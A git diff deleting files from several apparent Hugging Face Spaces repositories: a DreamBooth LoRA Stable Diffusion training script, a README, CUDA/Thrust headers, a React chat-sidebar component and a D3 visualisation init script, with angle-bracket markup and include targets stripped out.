- truncation=True, - padding="max_length", - max_length=self.tokenizer.model_max_length, - return_tensors="pt", - ).input_ids - - if self.class_data_root: - class_image = Image.open(self.class_images_path[index % self.num_class_images]) - if not class_image.mode == "RGB": - class_image = class_image.convert("RGB") - example["class_images"] = self.image_transforms(class_image) - example["class_prompt_ids"] = self.tokenizer( - self.class_prompt, - truncation=True, - padding="max_length", - max_length=self.tokenizer.model_max_length, - return_tensors="pt", - ).input_ids - - return example - - -def collate_fn(examples, with_prior_preservation=False): - input_ids = [example["instance_prompt_ids"] for example in examples] - pixel_values = [example["instance_images"] for example in examples] - - # Concat class 
and instance examples for prior preservation. - # We do this to avoid doing two forward passes. - if with_prior_preservation: - input_ids += [example["class_prompt_ids"] for example in examples] - pixel_values += [example["class_images"] for example in examples] - - pixel_values = torch.stack(pixel_values) - pixel_values = pixel_values.to(memory_format=torch.contiguous_format).float() - - input_ids = torch.cat(input_ids, dim=0) - - batch = { - "input_ids": input_ids, - "pixel_values": pixel_values, - } - return batch - - -class PromptDataset(Dataset): - "A simple dataset to prepare the prompts to generate class images on multiple GPUs." - - def __init__(self, prompt, num_samples): - self.prompt = prompt - self.num_samples = num_samples - - def __len__(self): - return self.num_samples - - def __getitem__(self, index): - example = {} - example["prompt"] = self.prompt - example["index"] = index - return example - - -def get_full_repo_name(model_id: str, organization: Optional[str] = None, token: Optional[str] = None): - if token is None: - token = HfFolder.get_token() - if organization is None: - username = whoami(token)["name"] - return f"{username}/{model_id}" - else: - return f"{organization}/{model_id}" - - -def main(args): - logging_dir = Path(args.output_dir, args.logging_dir) - - accelerator = Accelerator( - gradient_accumulation_steps=args.gradient_accumulation_steps, - mixed_precision=args.mixed_precision, - log_with=args.report_to, - logging_dir=logging_dir, - ) - - if args.report_to == "wandb": - if not is_wandb_available(): - raise ImportError("Make sure to install wandb if you want to use it for logging during training.") - import wandb - - # Currently, it's not possible to do gradient accumulation when training two models with accelerate.accumulate - # This will be enabled soon in accelerate. For now, we don't allow gradient accumulation when training two models. - # TODO (patil-suraj): Remove this check when gradient accumulation with two models is enabled in accelerate. - # Make one log on every process with the configuration for debugging. - logging.basicConfig( - format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", - datefmt="%m/%d/%Y %H:%M:%S", - level=logging.INFO, - ) - logger.info(accelerator.state, main_process_only=False) - if accelerator.is_local_main_process: - datasets.utils.logging.set_verbosity_warning() - transformers.utils.logging.set_verbosity_warning() - diffusers.utils.logging.set_verbosity_info() - else: - datasets.utils.logging.set_verbosity_error() - transformers.utils.logging.set_verbosity_error() - diffusers.utils.logging.set_verbosity_error() - - # If passed along, set the training seed now. - if args.seed is not None: - set_seed(args.seed) - - # Generate class images if prior preservation is enabled. 
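# Prior preservation (the DreamBooth regularization) trains on generic images of the
# class alongside the instance images so the fine-tuned model does not forget what the
# class looks like. The block below counts the images already present in class_data_dir
# and samples only the shortfall (num_class_images - cur_class_images) with the
# pretrained pipeline before training starts.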
- if args.with_prior_preservation: - class_images_dir = Path(args.class_data_dir) - if not class_images_dir.exists(): - class_images_dir.mkdir(parents=True) - cur_class_images = len(list(class_images_dir.iterdir())) - - if cur_class_images < args.num_class_images: - torch_dtype = torch.float16 if accelerator.device.type == "cuda" else torch.float32 - if args.prior_generation_precision == "fp32": - torch_dtype = torch.float32 - elif args.prior_generation_precision == "fp16": - torch_dtype = torch.float16 - elif args.prior_generation_precision == "bf16": - torch_dtype = torch.bfloat16 - pipeline = DiffusionPipeline.from_pretrained( - args.pretrained_model_name_or_path, - torch_dtype=torch_dtype, - safety_checker=None, - revision=args.revision, - ) - pipeline.set_progress_bar_config(disable=True) - - num_new_images = args.num_class_images - cur_class_images - logger.info(f"Number of class images to sample: {num_new_images}.") - - sample_dataset = PromptDataset(args.class_prompt, num_new_images) - sample_dataloader = torch.utils.data.DataLoader(sample_dataset, batch_size=args.sample_batch_size) - - sample_dataloader = accelerator.prepare(sample_dataloader) - pipeline.to(accelerator.device) - - for example in tqdm( - sample_dataloader, desc="Generating class images", disable=not accelerator.is_local_main_process - ): - images = pipeline(example["prompt"]).images - - for i, image in enumerate(images): - hash_image = hashlib.sha1(image.tobytes()).hexdigest() - image_filename = class_images_dir / f"{example['index'][i] + cur_class_images}-{hash_image}.jpg" - image.save(image_filename) - - del pipeline - if torch.cuda.is_available(): - torch.cuda.empty_cache() - - # Handle the repository creation - if accelerator.is_main_process: - if args.push_to_hub: - if args.hub_model_id is None: - repo_name = get_full_repo_name(Path(args.output_dir).name, token=args.hub_token) - else: - repo_name = args.hub_model_id - - create_repo(repo_name, exist_ok=True, token=args.hub_token) - repo = Repository(args.output_dir, clone_from=repo_name, token=args.hub_token) - - with open(os.path.join(args.output_dir, ".gitignore"), "w+") as gitignore: - if "step_*" not in gitignore: - gitignore.write("step_*\n") - if "epoch_*" not in gitignore: - gitignore.write("epoch_*\n") - elif args.output_dir is not None: - os.makedirs(args.output_dir, exist_ok=True) - - # Load the tokenizer - if args.tokenizer_name: - tokenizer = AutoTokenizer.from_pretrained(args.tokenizer_name, revision=args.revision, use_fast=False) - elif args.pretrained_model_name_or_path: - tokenizer = AutoTokenizer.from_pretrained( - args.pretrained_model_name_or_path, - subfolder="tokenizer", - revision=args.revision, - use_fast=False, - ) - - # import correct text encoder class - text_encoder_cls = import_model_class_from_model_name_or_path(args.pretrained_model_name_or_path, args.revision) - - # Load scheduler and models - noise_scheduler = DDPMScheduler.from_pretrained(args.pretrained_model_name_or_path, subfolder="scheduler") - text_encoder = text_encoder_cls.from_pretrained( - args.pretrained_model_name_or_path, subfolder="text_encoder", revision=args.revision - ) - vae = AutoencoderKL.from_pretrained(args.pretrained_model_name_or_path, subfolder="vae", revision=args.revision) - unet = UNet2DConditionModel.from_pretrained( - args.pretrained_model_name_or_path, subfolder="unet", revision=args.revision - ) - - # We only train the additional adapter LoRA layers - vae.requires_grad_(False) - text_encoder.requires_grad_(False) - unet.requires_grad_(False) - - # 
For mixed precision training we cast the text_encoder and vae weights to half-precision - # as these models are only used for inference, keeping weights in full precision is not required. - weight_dtype = torch.float32 - if accelerator.mixed_precision == "fp16": - weight_dtype = torch.float16 - elif accelerator.mixed_precision == "bf16": - weight_dtype = torch.bfloat16 - - # Move unet, vae and text_encoder to device and cast to weight_dtype - unet.to(accelerator.device, dtype=weight_dtype) - vae.to(accelerator.device, dtype=weight_dtype) - text_encoder.to(accelerator.device, dtype=weight_dtype) - - if args.enable_xformers_memory_efficient_attention: - if is_xformers_available(): - unet.enable_xformers_memory_efficient_attention() - else: - raise ValueError("xformers is not available. Make sure it is installed correctly") - - # now we will add new LoRA weights to the attention layers - # It's important to realize here how many attention weights will be added and of which sizes - # The sizes of the attention layers consist only of two different variables: - # 1) - the "hidden_size", which is increased according to `unet.config.block_out_channels`. - # 2) - the "cross attention size", which is set to `unet.config.cross_attention_dim`. - - # Let's first see how many attention processors we will have to set. - # For Stable Diffusion, it should be equal to: - # - down blocks (2x attention layers) * (2x transformer layers) * (3x down blocks) = 12 - # - mid blocks (2x attention layers) * (1x transformer layers) * (1x mid blocks) = 2 - # - up blocks (2x attention layers) * (3x transformer layers) * (3x down blocks) = 18 - # => 32 layers - - # Set correct lora layers - lora_attn_procs = {} - for name in unet.attn_processors.keys(): - cross_attention_dim = None if name.endswith("attn1.processor") else unet.config.cross_attention_dim - if name.startswith("mid_block"): - hidden_size = unet.config.block_out_channels[-1] - elif name.startswith("up_blocks"): - block_id = int(name[len("up_blocks.")]) - hidden_size = list(reversed(unet.config.block_out_channels))[block_id] - elif name.startswith("down_blocks"): - block_id = int(name[len("down_blocks.")]) - hidden_size = unet.config.block_out_channels[block_id] - - lora_attn_procs[name] = LoRACrossAttnProcessor( - hidden_size=hidden_size, cross_attention_dim=cross_attention_dim - ) - - unet.set_attn_processor(lora_attn_procs) - lora_layers = AttnProcsLayers(unet.attn_processors) - - accelerator.register_for_checkpointing(lora_layers) - - if args.scale_lr: - args.learning_rate = ( - args.learning_rate * args.gradient_accumulation_steps * args.train_batch_size * accelerator.num_processes - ) - - # Enable TF32 for faster training on Ampere GPUs, - # cf https://pytorch.org/docs/stable/notes/cuda.html#tensorfloat-32-tf32-on-ampere-devices - if args.allow_tf32: - torch.backends.cuda.matmul.allow_tf32 = True - - if args.scale_lr: - args.learning_rate = ( - args.learning_rate * args.gradient_accumulation_steps * args.train_batch_size * accelerator.num_processes - ) - - # Use 8-bit Adam for lower memory usage or to fine-tune the model in 16GB GPUs - if args.use_8bit_adam: - try: - import bitsandbytes as bnb - except ImportError: - raise ImportError( - "To use 8-bit Adam, please install the bitsandbytes library: `pip install bitsandbytes`." 
- ) - - optimizer_class = bnb.optim.AdamW8bit - else: - optimizer_class = torch.optim.AdamW - - # Optimizer creation - optimizer = optimizer_class( - lora_layers.parameters(), - lr=args.learning_rate, - betas=(args.adam_beta1, args.adam_beta2), - weight_decay=args.adam_weight_decay, - eps=args.adam_epsilon, - ) - - # Dataset and DataLoaders creation: - train_dataset = DreamBoothDataset( - instance_data_root=args.instance_data_dir, - instance_prompt=args.instance_prompt, - class_data_root=args.class_data_dir if args.with_prior_preservation else None, - class_prompt=args.class_prompt, - tokenizer=tokenizer, - size=args.resolution, - center_crop=args.center_crop, - ) - - train_dataloader = torch.utils.data.DataLoader( - train_dataset, - batch_size=args.train_batch_size, - shuffle=True, - collate_fn=lambda examples: collate_fn(examples, args.with_prior_preservation), - num_workers=args.dataloader_num_workers, - ) - - # Scheduler and math around the number of training steps. - overrode_max_train_steps = False - num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps) - if args.max_train_steps is None: - args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch - overrode_max_train_steps = True - - lr_scheduler = get_scheduler( - args.lr_scheduler, - optimizer=optimizer, - num_warmup_steps=args.lr_warmup_steps * args.gradient_accumulation_steps, - num_training_steps=args.max_train_steps * args.gradient_accumulation_steps, - num_cycles=args.lr_num_cycles, - power=args.lr_power, - ) - - # Prepare everything with our `accelerator`. - lora_layers, optimizer, train_dataloader, lr_scheduler = accelerator.prepare( - lora_layers, optimizer, train_dataloader, lr_scheduler - ) - - # We need to recalculate our total training steps as the size of the training dataloader may have changed. - num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps) - if overrode_max_train_steps: - args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch - # Afterwards we recalculate our number of training epochs - args.num_train_epochs = math.ceil(args.max_train_steps / num_update_steps_per_epoch) - - # We need to initialize the trackers we use, and also store our configuration. - # The trackers initializes automatically on the main process. - if accelerator.is_main_process: - accelerator.init_trackers("dreambooth-lora", config=vars(args)) - - # Train! - total_batch_size = args.train_batch_size * accelerator.num_processes * args.gradient_accumulation_steps - - logger.info("***** Running training *****") - logger.info(f" Num examples = {len(train_dataset)}") - logger.info(f" Num batches each epoch = {len(train_dataloader)}") - logger.info(f" Num Epochs = {args.num_train_epochs}") - logger.info(f" Instantaneous batch size per device = {args.train_batch_size}") - logger.info(f" Total train batch size (w. 
parallel, distributed & accumulation) = {total_batch_size}") - logger.info(f" Gradient Accumulation steps = {args.gradient_accumulation_steps}") - logger.info(f" Total optimization steps = {args.max_train_steps}") - global_step = 0 - first_epoch = 0 - - # Potentially load in the weights and states from a previous save - if args.resume_from_checkpoint: - if args.resume_from_checkpoint != "latest": - path = os.path.basename(args.resume_from_checkpoint) - else: - # Get the mos recent checkpoint - dirs = os.listdir(args.output_dir) - dirs = [d for d in dirs if d.startswith("checkpoint")] - dirs = sorted(dirs, key=lambda x: int(x.split("-")[1])) - path = dirs[-1] if len(dirs) > 0 else None - - if path is None: - accelerator.print( - f"Checkpoint '{args.resume_from_checkpoint}' does not exist. Starting a new training run." - ) - args.resume_from_checkpoint = None - else: - accelerator.print(f"Resuming from checkpoint {path}") - accelerator.load_state(os.path.join(args.output_dir, path)) - global_step = int(path.split("-")[1]) - - resume_global_step = global_step * args.gradient_accumulation_steps - first_epoch = global_step // num_update_steps_per_epoch - resume_step = resume_global_step % (num_update_steps_per_epoch * args.gradient_accumulation_steps) - - # Only show the progress bar once on each machine. - progress_bar = tqdm(range(global_step, args.max_train_steps), disable=not accelerator.is_local_main_process) - progress_bar.set_description("Steps") - - for epoch in range(first_epoch, args.num_train_epochs): - unet.train() - for step, batch in enumerate(train_dataloader): - # Skip steps until we reach the resumed step - if args.resume_from_checkpoint and epoch == first_epoch and step < resume_step: - if step % args.gradient_accumulation_steps == 0: - progress_bar.update(1) - continue - - with accelerator.accumulate(unet): - # Convert images to latent space - latents = vae.encode(batch["pixel_values"].to(dtype=weight_dtype)).latent_dist.sample() - latents = latents * 0.18215 - - # Sample noise that we'll add to the latents - noise = torch.randn_like(latents) - bsz = latents.shape[0] - # Sample a random timestep for each image - timesteps = torch.randint(0, noise_scheduler.config.num_train_timesteps, (bsz,), device=latents.device) - timesteps = timesteps.long() - - # Add noise to the latents according to the noise magnitude at each timestep - # (this is the forward diffusion process) - noisy_latents = noise_scheduler.add_noise(latents, noise, timesteps) - - # Get the text embedding for conditioning - encoder_hidden_states = text_encoder(batch["input_ids"])[0] - - # Predict the noise residual - model_pred = unet(noisy_latents, timesteps, encoder_hidden_states).sample - - # Get the target for loss depending on the prediction type - if noise_scheduler.config.prediction_type == "epsilon": - target = noise - elif noise_scheduler.config.prediction_type == "v_prediction": - target = noise_scheduler.get_velocity(latents, noise, timesteps) - else: - raise ValueError(f"Unknown prediction type {noise_scheduler.config.prediction_type}") - - if args.with_prior_preservation: - # Chunk the noise and model_pred into two parts and compute the loss on each part separately. 
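# collate_fn concatenated each batch as [instance examples, class examples] along dim 0
# when prior preservation is enabled, so torch.chunk(..., 2, dim=0) below splits the
# prediction and target back into the instance half and the class (prior) half; the
# prior half contributes to the loss only through prior_loss_weight.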
- model_pred, model_pred_prior = torch.chunk(model_pred, 2, dim=0) - target, target_prior = torch.chunk(target, 2, dim=0) - - # Compute instance loss - loss = F.mse_loss(model_pred.float(), target.float(), reduction="mean") - - # Compute prior loss - prior_loss = F.mse_loss(model_pred_prior.float(), target_prior.float(), reduction="mean") - - # Add the prior loss to the instance loss. - loss = loss + args.prior_loss_weight * prior_loss - else: - loss = F.mse_loss(model_pred.float(), target.float(), reduction="mean") - - accelerator.backward(loss) - if accelerator.sync_gradients: - params_to_clip = lora_layers.parameters() - accelerator.clip_grad_norm_(params_to_clip, args.max_grad_norm) - optimizer.step() - lr_scheduler.step() - optimizer.zero_grad() - - # Checks if the accelerator has performed an optimization step behind the scenes - if accelerator.sync_gradients: - progress_bar.update(1) - global_step += 1 - - if global_step % args.checkpointing_steps == 0: - if accelerator.is_main_process: - save_path = os.path.join(args.output_dir, f"checkpoint-{global_step}") - accelerator.save_state(save_path) - logger.info(f"Saved state to {save_path}") - - logs = {"loss": loss.detach().item(), "lr": lr_scheduler.get_last_lr()[0]} - progress_bar.set_postfix(**logs) - accelerator.log(logs, step=global_step) - - if global_step >= args.max_train_steps: - break - - if args.validation_prompt is not None and epoch % args.validation_epochs == 0: - logger.info( - f"Running validation... \n Generating {args.num_validation_images} images with prompt:" - f" {args.validation_prompt}." - ) - # create pipeline - pipeline = DiffusionPipeline.from_pretrained( - args.pretrained_model_name_or_path, - unet=accelerator.unwrap_model(unet), - text_encoder=accelerator.unwrap_model(text_encoder), - revision=args.revision, - torch_dtype=weight_dtype, - ) - pipeline.scheduler = DPMSolverMultistepScheduler.from_config(pipeline.scheduler.config) - pipeline = pipeline.to(accelerator.device) - pipeline.set_progress_bar_config(disable=True) - - # run inference - generator = torch.Generator(device=accelerator.device).manual_seed(args.seed) - prompt = args.num_validation_images * [args.validation_prompt] - images = pipeline(prompt, num_inference_steps=25, generator=generator).images - - for tracker in accelerator.trackers: - if tracker.name == "tensorboard": - np_images = np.stack([np.asarray(img) for img in images]) - tracker.writer.add_images("validation", np_images, epoch, dataformats="NHWC") - if tracker.name == "wandb": - tracker.log( - { - "validation": [ - wandb.Image(image, caption=f"{i}: {args.validation_prompt}") - for i, image in enumerate(images) - ] - } - ) - - del pipeline - torch.cuda.empty_cache() - - # Save the lora layers - accelerator.wait_for_everyone() - if accelerator.is_main_process: - unet = unet.to(torch.float32) - unet.save_attn_procs(args.output_dir) - - # Final inference - # Load previous pipeline - pipeline = DiffusionPipeline.from_pretrained( - args.pretrained_model_name_or_path, revision=args.revision, torch_dtype=weight_dtype - ) - pipeline.scheduler = DPMSolverMultistepScheduler.from_config(pipeline.scheduler.config) - pipeline = pipeline.to(accelerator.device) - - # load attention processors - pipeline.unet.load_attn_procs(args.output_dir) - - # run inference - if args.validation_prompt and args.num_validation_images > 0: - generator = torch.Generator(device=accelerator.device).manual_seed(args.seed) if args.seed else None - prompt = args.num_validation_images * [args.validation_prompt] - images = 
pipeline(prompt, num_inference_steps=25, generator=generator).images - - test_image_dir = Path(args.output_dir) / 'test_images' - test_image_dir.mkdir() - for i, image in enumerate(images): - out_path = test_image_dir / f'image_{i}.png' - image.save(out_path) - - for tracker in accelerator.trackers: - if tracker.name == "tensorboard": - np_images = np.stack([np.asarray(img) for img in images]) - tracker.writer.add_images("test", np_images, epoch, dataformats="NHWC") - if tracker.name == "wandb": - tracker.log( - { - "test": [ - wandb.Image(image, caption=f"{i}: {args.validation_prompt}") - for i, image in enumerate(images) - ] - } - ) - - if args.push_to_hub: - save_model_card( - repo_name, - images=images, - base_model=args.pretrained_model_name_or_path, - prompt=args.instance_prompt, - repo_folder=args.output_dir, - ) - repo.push_to_hub(commit_message="End of training", blocking=False, auto_lfs_prune=True) - - accelerator.end_training() - - -if __name__ == "__main__": - args = parse_args() - main(args) diff --git a/spaces/lvwerra/license-static/README.md b/spaces/lvwerra/license-static/README.md deleted file mode 100644 index 642714cf7aa0e52fb69c17dc95e040f1629c1054..0000000000000000000000000000000000000000 --- a/spaces/lvwerra/license-static/README.md +++ /dev/null @@ -1,10 +0,0 @@ ---- -title: License Static -emoji: 💻 -colorFrom: indigo -colorTo: indigo -sdk: static -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/ma-xu/LIVE/thrust/dependencies/cub/experimental/histogram/histogram_cub.h b/spaces/ma-xu/LIVE/thrust/dependencies/cub/experimental/histogram/histogram_cub.h deleted file mode 100644 index 07c2e4aa2db26a2f788003e950cb8c82f40a7846..0000000000000000000000000000000000000000 --- a/spaces/ma-xu/LIVE/thrust/dependencies/cub/experimental/histogram/histogram_cub.h +++ /dev/null @@ -1,109 +0,0 @@ -/****************************************************************************** - * Copyright (c) 2011-2018, NVIDIA CORPORATION. All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * * Redistributions of source code must retain the above copyright - * notice, this list of conditions and the following disclaimer. - * * Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * * Neither the name of the NVIDIA CORPORATION nor the - * names of its contributors may be used to endorse or promote products - * derived from this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND - * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED - * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. 
IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY - * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES - * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; - * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND - * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT - * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS - * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - * - ******************************************************************************/ - -#include - -using namespace cub; - -template < - int NUM_CHANNELS, - int ACTIVE_CHANNELS, - int NUM_BINS, - typename PixelType> -double run_cub_histogram( - PixelType *d_image, - int width, - int height, - unsigned int *d_hist, - bool is_warmup) -{ - enum { - is_float = Equals::VALUE, - }; - - typedef typename If::Type SampleT; // Sample type - typedef typename If::Type LevelT; // Level type (uint32 for uchar) - - // Setup data structures - unsigned int* d_histogram[ACTIVE_CHANNELS]; - int num_levels[ACTIVE_CHANNELS]; ///< [in] The number of boundaries (levels) for delineating histogram samples in each active channel. Implies that the number of bins for channeli is num_levels[i] - 1. - LevelT lower_level[ACTIVE_CHANNELS]; ///< [in] The lower sample value bound (inclusive) for the lowest histogram bin in each active channel. - LevelT upper_level[ACTIVE_CHANNELS]; ///< [in] The upper sample value bound (exclusive) for the highest histogram bin in each active channel. - - for (int CHANNEL = 0; CHANNEL < ACTIVE_CHANNELS; ++CHANNEL) - { - d_histogram[CHANNEL] = d_hist + (CHANNEL * NUM_BINS); - num_levels[CHANNEL] = NUM_BINS + 1; - lower_level[CHANNEL] = 0; - upper_level[CHANNEL] = (is_float) ? 1 : 256; - } - - // Allocate temporary storage - size_t temp_storage_bytes = 0; - void *d_temp_storage = NULL; - - SampleT* d_image_samples = (SampleT*) d_image; - - // Get amount of temporary storage needed - DeviceHistogram::MultiHistogramEven( - d_temp_storage, - temp_storage_bytes, - d_image_samples, - d_histogram, - num_levels, - lower_level, - upper_level, - width * height, - (cudaStream_t) 0, - is_warmup); - - cudaMalloc(&d_temp_storage, temp_storage_bytes); - - GpuTimer gpu_timer; - gpu_timer.Start(); - - // Compute histogram - DeviceHistogram::MultiHistogramEven( - d_temp_storage, - temp_storage_bytes, - d_image_samples, - d_histogram, - num_levels, - lower_level, - upper_level, - width * height, - (cudaStream_t) 0, - is_warmup); - - gpu_timer.Stop(); - float elapsed_millis = gpu_timer.ElapsedMillis(); - - cudaFree(d_temp_storage); - - return elapsed_millis; -} - diff --git a/spaces/ma-xu/LIVE/thrust/thrust/system/omp/detail/generate.h b/spaces/ma-xu/LIVE/thrust/thrust/system/omp/detail/generate.h deleted file mode 100644 index f907b6acc079577642c446d6f0736073defc44b8..0000000000000000000000000000000000000000 --- a/spaces/ma-xu/LIVE/thrust/thrust/system/omp/detail/generate.h +++ /dev/null @@ -1,23 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. 
- * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -#pragma once - -#include - -// this system inherits generate -#include - diff --git a/spaces/ma-xu/LIVE/thrust/thrust/system/tbb/detail/reverse.h b/spaces/ma-xu/LIVE/thrust/thrust/system/tbb/detail/reverse.h deleted file mode 100644 index 1f3e0325e257c301215e62c690837433ae24c30c..0000000000000000000000000000000000000000 --- a/spaces/ma-xu/LIVE/thrust/thrust/system/tbb/detail/reverse.h +++ /dev/null @@ -1,23 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -#pragma once - -#include - -// this system inherits reverse -#include - diff --git a/spaces/matthoffner/chatbot-mini/components/Chatbar/components/Conversation.tsx b/spaces/matthoffner/chatbot-mini/components/Chatbar/components/Conversation.tsx deleted file mode 100644 index b9c57393c045baf710e7d1cd24aa57a3a09eb68a..0000000000000000000000000000000000000000 --- a/spaces/matthoffner/chatbot-mini/components/Chatbar/components/Conversation.tsx +++ /dev/null @@ -1,168 +0,0 @@ -import { - IconCheck, - IconMessage, - IconPencil, - IconTrash, - IconX, -} from '@tabler/icons-react'; -import { - DragEvent, - KeyboardEvent, - MouseEventHandler, - useContext, - useEffect, - useState, -} from 'react'; - -import { Conversation } from '@/types/chat'; - -import HomeContext from '@/pages/api/home/home.context'; - -import SidebarActionButton from '@/components/Buttons/SidebarActionButton'; -import ChatbarContext from '@/components/Chatbar/Chatbar.context'; - -interface Props { - conversation: Conversation; -} - -export const ConversationComponent = ({ conversation }: Props) => { - const { - state: { selectedConversation, messageIsStreaming }, - handleSelectConversation, - handleUpdateConversation, - } = useContext(HomeContext); - - const { handleDeleteConversation } = useContext(ChatbarContext); - - const [isDeleting, setIsDeleting] = useState(false); - const [isRenaming, setIsRenaming] = useState(false); - const [renameValue, setRenameValue] = useState(''); - - const handleEnterDown = (e: KeyboardEvent) => { - if (e.key === 'Enter') { - e.preventDefault(); - selectedConversation && handleRename(selectedConversation); - } - }; - - const handleDragStart = ( - e: DragEvent, - conversation: Conversation, - ) => { - if (e.dataTransfer) { - e.dataTransfer.setData('conversation', JSON.stringify(conversation)); - } - }; - - const handleRename = (conversation: Conversation) => { - if (renameValue.trim().length > 0) { - handleUpdateConversation(conversation, { - key: 'name', - value: renameValue, - }); - setRenameValue(''); - setIsRenaming(false); - } - }; - - const 
handleConfirm: MouseEventHandler = (e) => { - e.stopPropagation(); - if (isDeleting) { - handleDeleteConversation(conversation); - } else if (isRenaming) { - handleRename(conversation); - } - setIsDeleting(false); - setIsRenaming(false); - }; - - const handleCancel: MouseEventHandler = (e) => { - e.stopPropagation(); - setIsDeleting(false); - setIsRenaming(false); - }; - - const handleOpenRenameModal: MouseEventHandler = (e) => { - e.stopPropagation(); - setIsRenaming(true); - selectedConversation && setRenameValue(selectedConversation.name); - }; - const handleOpenDeleteModal: MouseEventHandler = (e) => { - e.stopPropagation(); - setIsDeleting(true); - }; - - useEffect(() => { - if (isRenaming) { - setIsDeleting(false); - } else if (isDeleting) { - setIsRenaming(false); - } - }, [isRenaming, isDeleting]); - - return ( -
          - {isRenaming && selectedConversation?.id === conversation.id ? ( -
          - - setRenameValue(e.target.value)} - onKeyDown={handleEnterDown} - autoFocus - /> -
          - ) : ( - - )} - - {(isDeleting || isRenaming) && - selectedConversation?.id === conversation.id && ( -
          - - - - - - -
          - )} - - {selectedConversation?.id === conversation.id && - !isDeleting && - !isRenaming && ( -
          - - - - - - -
          - )} -
          - ); -}; diff --git a/spaces/mehzhats/dogbreedidentifier/README.md b/spaces/mehzhats/dogbreedidentifier/README.md deleted file mode 100644 index 545ddac449be90b2233acb3aac1ab3288afda7ba..0000000000000000000000000000000000000000 --- a/spaces/mehzhats/dogbreedidentifier/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Dogbreedidentifier -emoji: 🐨 -colorFrom: blue -colorTo: green -sdk: gradio -sdk_version: 3.4.1 -app_file: app.py -pinned: false -license: ecl-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/merve/hidden-bias/server-side/fill-in-the-blank/scatter-plot-colab/spearman-distribution/init.js b/spaces/merve/hidden-bias/server-side/fill-in-the-blank/scatter-plot-colab/spearman-distribution/init.js deleted file mode 100644 index 45e4fafb63a667109fdf81c03ed1d375027ae462..0000000000000000000000000000000000000000 --- a/spaces/merve/hidden-bias/server-side/fill-in-the-blank/scatter-plot-colab/spearman-distribution/init.js +++ /dev/null @@ -1,168 +0,0 @@ -/* Copyright 2021 Google LLC. All Rights Reserved. - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -==============================================================================*/ - - -// console.clear() - -window.init = function(){ - var initFns = [window.initUtil, window.initScatter, window.initPair] - if (!initFns.every(d => d)) return - - window.util = initUtil() - - window.tidy = d3.csvParse(python_data.tidyCSV, d => { - return { - e0: +d.e0, - e1: +d.e1, - i0: +d.i0, - i1: +d.i1, - tokenIndex: +d.tokenIndex, - sentenceIndex: +d.sentenceIndex, - } - }) - - var bySentence = d3.nestBy(tidy, d => d.sentenceIndex) - bySentence.forEach(sent => { - sent.sentenceIndex = +sent.key - sent.s0 = python_data.sentences[sent.sentenceIndex].s0 - sent.s1 = python_data.sentences[sent.sentenceIndex].s1 - sent.orig = python_data.sentences[sent.sentenceIndex].orig - - sent.corrA = ss.sampleCorrelation(sent.map(d => d.i0), sent.map(d => d.i1)) - // sent.corrA = ss.sampleCorrelation(sent.map(d => d.e0), sent.map(d => d.e1)) - }) - - var sel = d3.select('.container').html(` -
          -
          -
          -
          -
          -
          -
